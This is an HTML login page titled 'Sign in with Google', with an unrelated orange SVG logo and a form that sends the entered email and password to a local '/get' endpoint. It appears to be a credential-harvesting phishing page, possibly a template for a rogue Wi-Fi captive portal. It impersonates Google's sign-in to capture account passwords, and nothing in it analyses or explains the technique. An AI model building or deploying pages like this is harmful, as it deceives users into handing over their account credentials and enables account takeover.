<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FF6600;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #FF6600;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #FF6600;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
    display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #FF6600;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="500.000000pt" height="126.000000pt" viewBox="0 0 5000.000000 1265.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,1265.000000) scale(0.100000,-0.100000)"
fill="#FF6600" stroke="none">
<path d="M12 6328 l3 -6323 24985 -3 24985 -2 -3 6325 -2 6325 -24985 0
-24985 0 2 -6322z m34058 5021 c779 -40 1203 -158 1416 -392 103 -113 144
-235 144 -431 -1 -296 -78 -426 -345 -584 -307 -181 -382 -260 -434 -454 -48
-177 -65 -620 -81 -2063 -17 -1559 -38 -1935 -130 -2371 -83 -390 -289 -819
-544 -1134 -297 -366 -719 -647 -1224 -816 -779 -260 -1889 -272 -2726 -29
-868 252 -1462 748 -1720 1437 -81 217 -119 437 -119 698 -1 285 40 489 142
705 219 464 644 726 1175 726 620 -1 1111 -346 1270 -893 63 -217 66 -397 13
-707 -55 -321 -49 -399 42 -491 69 -71 138 -94 261 -87 334 19 562 252 671
685 65 258 62 161 66 2092 4 1788 0 2045 -33 2190 -40 180 -112 265 -297 354
-118 57 -189 89 -247 113 -68 29 -199 124 -239 174 -140 176 -134 543 13 764
226 341 798 500 1901 529 191 5 823 -4 1025 -15z m11718 -864 c78 -18 147 -53
190 -96 38 -37 52 -62 77 -134 38 -111 46 -207 52 -687 l6 -467 741 -3 741 -3
50 -25 c40 -20 55 -35 75 -75 l25 -50 3 -380 c4 -504 -7 -588 -91 -662 -41
-36 -110 -59 -202 -68 -33 -4 -332 -17 -665 -30 -358 -14 -617 -28 -635 -34
-59 -22 -77 -36 -98 -76 l-22 -40 0 -1200 c0 -1117 1 -1205 18 -1276 66 -283
250 -421 562 -422 97 0 121 4 203 32 51 17 140 53 198 81 174 81 246 104 344
104 76 1 91 -2 138 -29 136 -75 221 -235 253 -474 31 -228 -21 -404 -182 -618
-348 -461 -1082 -804 -1868 -874 -178 -15 -599 -7 -741 16 -316 50 -560 130
-777 257 -443 259 -723 704 -818 1300 -36 224 -37 294 -40 1780 -2 813 -6
1481 -9 1486 -3 5 -117 12 -253 15 -376 10 -491 33 -565 115 -52 57 -68 121
-75 287 -12 303 35 445 194 580 41 35 187 140 326 235 139 94 284 194 322 221
39 27 108 76 155 108 47 32 121 84 164 115 167 120 729 490 906 596 379 228
683 360 930 403 64 11 308 6 368 -8z m-33563 -1249 c1056 -103 1720 -469 2030
-1119 96 -202 151 -411 176 -667 13 -137 8 -591 -12 -1042 -16 -367 -7 -1277
14 -1380 44 -220 97 -284 296 -349 179 -59 259 -117 315 -228 107 -210 -6
-548 -277 -828 -114 -118 -202 -191 -343 -283 -355 -232 -793 -360 -1236 -360
-308 0 -496 49 -663 172 -33 24 -136 124 -230 222 -194 202 -238 236 -302 236
-60 0 -94 -16 -198 -95 -278 -210 -521 -340 -765 -412 -431 -127 -1060 -98
-1498 68 -281 107 -490 244 -691 455 -213 223 -360 528 -418 867 -25 144 -24
467 0 592 75 381 263 705 572 985 291 264 718 474 1168 574 263 59 378 70 712
70 328 1 433 -8 783 -68 92 -16 135 -19 137 -12 2 6 9 137 14 291 30 779 -62
1159 -307 1273 -52 24 -68 26 -182 26 -106 0 -134 -3 -182 -23 -140 -55 -256
-161 -473 -431 -295 -368 -462 -521 -680 -626 -358 -171 -742 -115 -956 139
-71 84 -111 159 -145 272 -24 79 -27 107 -27 225 0 160 19 245 87 385 242 495
924 874 1841 1024 194 32 258 38 620 65 110 8 679 -4 820 -18z m-6485 -15
c212 -28 347 -55 526 -106 338 -97 671 -261 929 -459 116 -89 147 -116 280
-251 358 -364 586 -838 651 -1354 20 -159 19 -468 -1 -605 -40 -266 -128 -420
-289 -501 -134 -67 -78 -65 -1594 -65 -809 0 -1401 -4 -1451 -10 -153 -17
-187 -51 -183 -181 4 -146 85 -352 196 -499 215 -285 530 -481 906 -565 100
-22 387 -31 505 -16 257 34 481 119 880 337 263 143 365 168 508 124 72 -22
165 -85 214 -144 114 -139 163 -387 113 -579 -98 -387 -584 -823 -1231 -1106
-696 -305 -1529 -378 -2277 -201 -1050 250 -1853 975 -2194 1980 -104 307
-154 596 -165 945 -21 739 203 1425 663 2025 101 132 159 197 293 329 474 466
1071 770 1726 881 104 17 179 26 385 44 105 9 463 -4 610 -23z m13725 14 c141
-35 326 -156 470 -307 120 -125 139 -149 221 -271 128 -191 235 -436 279 -637
23 -105 31 -325 15 -414 -54 -302 -277 -492 -600 -513 -172 -10 -339 36 -498
139 -110 72 -161 116 -407 358 -224 219 -295 276 -397 317 -220 89 -440 29
-524 -143 -24 -48 -26 -63 -22 -133 5 -94 29 -141 111 -218 81 -77 159 -124
397 -240 118 -58 310 -152 425 -208 712 -349 1144 -682 1392 -1075 147 -234
220 -472 244 -795 34 -468 -105 -923 -389 -1280 -277 -347 -691 -604 -1176
-730 -271 -70 -444 -94 -747 -102 -390 -10 -645 25 -1124 156 -197 54 -260 55
-400 5 -273 -98 -350 -111 -460 -79 -195 56 -432 254 -617 514 -176 247 -297
526 -350 808 -30 163 -31 404 0 546 47 223 145 347 315 399 58 17 87 20 185
16 243 -10 387 -96 680 -409 382 -408 641 -596 882 -639 176 -32 336 43 381
177 17 54 5 163 -26 231 -34 74 -110 151 -211 212 -45 27 -177 93 -295 146
-359 161 -558 268 -754 402 -712 487 -1068 1107 -1042 1812 21 551 309 1073
792 1436 433 325 950 495 1505 496 202 0 332 -15 595 -72 441 -95 485 -93 755
21 214 90 281 103 395 74z m20380 -15 c393 -51 686 -136 1010 -295 519 -254
913 -641 1151 -1130 143 -293 210 -548 236 -893 13 -168 1 -396 -27 -532 -45
-218 -141 -362 -289 -431 -130 -61 -86 -59 -1584 -59 -809 0 -1401 -4 -1451
-10 -153 -17 -187 -51 -183 -181 4 -146 85 -352 196 -499 215 -284 531 -481
906 -565 100 -22 387 -31 505 -16 258 34 476 117 887 340 214 116 296 145 398
138 96 -6 170 -35 245 -95 126 -100 194 -253 203 -452 4 -98 1 -128 -17 -195
-93 -337 -426 -676 -947 -963 -656 -361 -1439 -506 -2206 -407 -1038 134
-1898 717 -2359 1600 -228 436 -340 875 -356 1390 -21 739 203 1424 663 2026
97 127 165 202 298 333 414 405 906 679 1484 826 187 47 322 68 622 94 107 9
463 -4 615 -24z m-16070 -70 c402 -33 630 -82 825 -178 76 -37 111 -62 171
-122 114 -113 160 -230 161 -410 1 -197 -30 -261 -213 -440 -158 -155 -167
-172 -149 -284 34 -215 258 -793 372 -963 75 -111 167 -174 277 -192 112 -18
206 10 288 86 158 145 405 701 454 1021 11 73 11 89 -5 137 -22 70 -79 145
-216 280 -169 167 -220 258 -220 392 1 281 237 498 653 598 437 106 1108 109
1497 8 270 -70 444 -187 523 -353 43 -90 57 -162 57 -289 -1 -238 -78 -390
-252 -493 -37 -22 -149 -73 -248 -113 -472 -190 -563 -310 -863 -1136 -106
-293 -230 -664 -353 -1059 -53 -168 -140 -449 -195 -625 -311 -996 -489 -1482
-731 -1995 -292 -620 -664 -1147 -1038 -1474 -501 -439 -1026 -636 -1693 -636
-414 0 -737 69 -1049 226 -250 125 -442 293 -593 519 -158 236 -231 467 -242
770 -9 242 28 420 125 609 190 369 544 595 933 596 397 0 712 -194 884 -545
65 -134 101 -241 160 -477 66 -264 109 -329 218 -331 90 -2 122 9 180 66 73
71 98 138 105 277 13 291 -124 724 -482 1525 -8 17 -23 50 -34 75 -47 107
-264 584 -306 673 -25 54 -46 99 -46 101 0 2 -22 50 -49 107 -42 91 -88 188
-201 434 -15 33 -93 202 -173 375 -80 173 -162 351 -182 395 -45 100 -52 113
-169 367 -53 114 -96 209 -96 212 0 2 -13 33 -29 68 -15 35 -52 117 -82 183
-70 156 -148 274 -236 356 -58 53 -106 83 -254 159 -209 108 -291 166 -349
247 -63 88 -85 172 -85 323 0 104 4 137 23 195 34 100 76 168 156 252 266 281
817 444 1656 493 195 11 942 4 1115 -10z"/>
<path d="M11331 5745 c-192 -54 -318 -196 -383 -432 -18 -67 -21 -106 -22
-273 0 -169 3 -207 22 -282 63 -253 205 -378 430 -378 176 0 291 84 343 250
44 143 52 242 53 645 1 418 1 419 -61 461 -24 16 -50 19 -178 21 -108 2 -165
-2 -204 -12z"/>
<path d="M5132 8110 c-248 -65 -457 -279 -534 -546 -20 -67 -23 -102 -23 -234
0 -132 3 -160 19 -190 29 -55 55 -78 110 -97 46 -16 95 -18 501 -18 472 0 548
5 625 45 21 11 49 33 63 49 45 54 52 92 52 281 0 202 -10 255 -77 390 -79 161
-241 289 -413 325 -97 20 -234 18 -323 -5z"/>
<path d="M39242 8110 c-205 -54 -386 -205 -482 -404 -61 -127 -81 -203 -87
-341 -7 -148 11 -225 66 -277 21 -20 56 -42 77 -49 27 -9 151 -14 413 -16 535
-6 674 10 751 87 54 54 65 106 65 295 0 180 -13 249 -71 370 -129 272 -437
412 -732 335z"/>
</g>
</svg>
  </div>

  <div class="form-container">

    <center><h1>Sign in with <b>Google</b></h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>

      <button class="submit-btn" type="submit">Continue</button>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
